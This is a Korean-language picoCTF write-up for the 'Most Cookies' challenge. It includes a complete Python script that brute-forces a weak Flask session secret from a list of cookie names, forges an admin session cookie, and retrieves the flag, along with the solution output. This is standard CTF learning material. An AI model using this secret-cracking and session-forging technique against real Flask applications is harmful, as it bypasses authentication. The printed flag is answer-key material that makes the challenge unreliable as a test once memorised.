[pico CTF] Most Cookies

1. 개요

플라스크 세션 조작 문제

 

전혀 몰라서 다음 2개의 글을 참고했습니다.

https://ctftime.org/writeup/26978

https://blog.paradoxis.nl/defeating-flasks-session-management-65706ba9d3ce

 

2. 분석

처음 문제를 보면 말이 안된다.

 

쿠키의 very_auth 값이 admin이어야하는데

		check = session["very_auth"]
		if check == "admin":

 

very_auth는 cookie_names의 값으로 발급되는데, admin이라는 값은 없습니다.

cookie_names = ["snickerdoodle", "chocolate chip", "oatmeal raisin", "gingersnap", "shortbread", "peanut butter", "whoopie pie", "sugar", "molasses", "kiss", "biscotti", "butter", "spritz", "snowball", "drop", "thumbprint", "pinwheel", "wafer", "macaroon", "fortune", "crinkle", "icebox", "gingerbread", "tassie", "lebkuchen", "macaron", "black and white", "white chocolate macadamia"]

session["very_auth"] = request.form["name"]

 

즉, 정상적인 쿠키를 발급 받아서, 쿠키를 조작해서 admin 값을 넣어야합니다.

 

3. exploit

1) 정상적인 쿠키 발급

2) 쿠키에서 secret 찾음

3) secret으로 어드민 쿠키 생성

4) admin 쿠키로 flag 발급

 

import requests
import re
import hashlib
from flask.json.tag import TaggedJSONSerializer
from itsdangerous import URLSafeTimedSerializer, TimestampSigner, BadSignature

cookie_names = ["snickerdoodle", "chocolate chip", "oatmeal raisin", "gingersnap", "shortbread", "peanut butter", "whoopie pie", "sugar", "molasses", "kiss", "biscotti", "butter", "spritz", "snowball", "drop", "thumbprint", "pinwheel", "wafer", "macaroon", "fortune", "crinkle", "icebox", "gingerbread", "tassie", "lebkuchen", "macaron", "black and white", "white chocolate macadamia"]

def get_cookie(cookie_name):
    session = requests.Session()
    r = session.post('http://mercury.picoctf.net:44693/search', data={'name': cookie_name})

    return r.headers["Set-Cookie"].split("; ")[0]

def get_secret(cookie):
    for cookie_name in cookie_names:
        try:
            serializer = URLSafeTimedSerializer(
                secret_key=cookie_name,
                salt='cookie-session',
                serializer=TaggedJSONSerializer(),
                signer=TimestampSigner,
                signer_kwargs={
                    'key_derivation': 'hmac',
                    'digest_method': hashlib.sha1
                }).loads(cookie.split("=")[1])
        except BadSignature:
            continue

        return cookie_name

def make_admin_cookie(secret):
    return (URLSafeTimedSerializer(
        secret_key=secret,
        salt='cookie-session',
        serializer=TaggedJSONSerializer(),
        signer=TimestampSigner,
        signer_kwargs={
            'key_derivation': 'hmac',
            'digest_method': hashlib.sha1
        }
    ).dumps({'very_auth' : 'admin'}))

def get_flag(cookie):
    session = requests.Session()
    r = session.get('http://mercury.picoctf.net:44693/display', headers={'Cookie': f"session={cookie}"})

    return re.findall("picoCTF{[a-zA-Z0-9_]+}", r.text)


if __name__ == "__main__":
    cookie = get_cookie(cookie_names[0])

    secret = get_secret(cookie)
    print("real secret", secret)

    admin_cookie = make_admin_cookie(secret)

    flags = get_flag(admin_cookie)
    print("flags", flags[0])

 

real secret butter
flags picoCTF{pwn_4ll_th3_cook1E5_dbfe90bf}